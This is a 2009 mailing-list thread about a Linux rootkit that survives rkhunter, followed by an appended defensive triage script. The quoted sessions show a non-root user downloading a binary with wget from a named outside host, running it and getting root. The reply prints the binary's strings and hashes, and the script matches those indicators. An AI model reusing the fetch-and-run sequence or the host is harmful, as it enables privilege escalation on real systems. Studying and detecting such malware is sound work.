On Sun, 4 Oct 2009 10:15:35 -0400 Thomas Krichel <[email protected]> wrote:
> I am running debian testing, 2.6.30 kernel.
>
> I have a rootkit installed on a bunch of machines that rkhunter
> does not find. This appears after infection with SHV4 / SHV5,
> which rkhunter found.
>
> Here it works to allow a non-root user to become root
>
> kric...@fricka:~$ mkdir a
> kric...@fricka:~$ cd a
> kric...@fricka:~/a$ ls -l
> total 0
> kric...@fricka:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:47:42-- http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886 6.88K/s in 1.0s
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> kric...@fricka:~/a$ chmod 777 a
> kric...@fricka:~/a$ ./a
> r...@fricka:~/a#
>
> Here is a situation where it does not work
>
> kric...@chichek:~$ mkdir a
> kric...@chichek:~$ cd a
> kric...@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15-- http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886 37.8K/s in 0.2s
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> kric...@chichek:~/a$ chmod 777 a
> kric...@chichek:~/a$ ./a
> mmap: Permission denied
>
> Does anybody here know how to delete this kit?
>
> Cheers,
>
> Thomas Krichel http://openlib.org/home/krichel
> RePEc:per:1965-06-05:thomas_krichel
> skype: thomaskrichel

This file should at least be deleted from the host.
fg...@foo:~$ file a
a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
fg...@foo:~$ strings a
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
exit
execl
ftruncate
perror
sendfile
unlink
mkstemp
mmap
getpagesize
getgid
getuid
__libc_start_main
GLIBC_2.1
GLIBC_2.0
PTRh
([^_]
[^_]
mmap
socket
mkstemp
unlink
ftruncate
/bin/sh
/tmp/tmp.XXXXXX
fg...@foo:~$ md5sum a
b950af01be61a8cbf5d479430738bd18  a
fg...@foo:~$ sha1sum a
639536caea56554406106ad8679115971485f3a2  a
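A report-only triage script, added here as an example and not part of the thread, that applies the reply's checks across a directory tree: it compares each file against the MD5/SHA-1 values posted above, recognises ELF files by their magic bytes, and flags binaries that contain the full set of libc imports seen in the posted `strings` output (mmap, sendfile, mkstemp, execl, ftruncate). The indicator set and the "flag only when all five are present" threshold are assumptions chosen to keep false positives down, and a `tr`-based stand-in replaces `strings` so the script runs without binutils.

```shell
#!/bin/sh
# Added example, not from the thread: report-only triage for copies of the
# posted "a" binary across a directory tree. Hash values are those posted
# above; the symbol set is taken from the posted `strings` output. Nothing
# is deleted, so a hit can be preserved for analysis before removal.

KNOWN_MD5="b950af01be61a8cbf5d479430738bd18"
KNOWN_SHA1="639536caea56554406106ad8679115971485f3a2"
# Assumed indicator set: imports the posted binary resolves from libc.
SUSPECT_SYMS="mmap sendfile mkstemp execl ftruncate"

# hash_matches FILE: succeeds if FILE's MD5 or SHA-1 equals a posted value.
hash_matches() {
    md5=$(md5sum "$1" | cut -d' ' -f1)
    sha1=$(sha1sum "$1" | cut -d' ' -f1)
    [ "$md5" = "$KNOWN_MD5" ] || [ "$sha1" = "$KNOWN_SHA1" ]
}

# is_elf FILE: succeeds if FILE starts with the ELF magic bytes (\177ELF).
is_elf() {
    [ "$(head -c 4 "$1" 2>/dev/null | od -An -c | tr -d ' \n')" = "177ELF" ]
}

# imports_all_suspects FILE: succeeds if every SUSPECT_SYMS token occurs in
# FILE. Splitting on non-identifier bytes with tr stands in for `strings`,
# so the check works without binutils installed.
imports_all_suspects() {
    for s in $SUSPECT_SYMS; do
        tr -c '[:alnum:]_' '\n' < "$1" | grep -qx "$s" || return 1
    done
    return 0
}

# scan_tree DIR: prints "HASH-MATCH path" for exact copies and "REVIEW path"
# for other ELF files carrying the whole indicator set (same filesystem only).
scan_tree() {
    find "$1" -xdev -type f 2>/dev/null | while IFS= read -r f; do
        if hash_matches "$f"; then
            printf 'HASH-MATCH %s\n' "$f"
        elif is_elf "$f" && imports_all_suspects "$f"; then
            printf 'REVIEW %s\n' "$f"
        fi
    done
}

if [ $# -eq 1 ]; then
    scan_tree "$1"
fi
```

Run it as `sh triage.sh /` (or any mount point) and review each reported path by hand; the REVIEW class will also include legitimate programs that happen to use all five calls, so treat it as a shortlist rather than a verdict.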

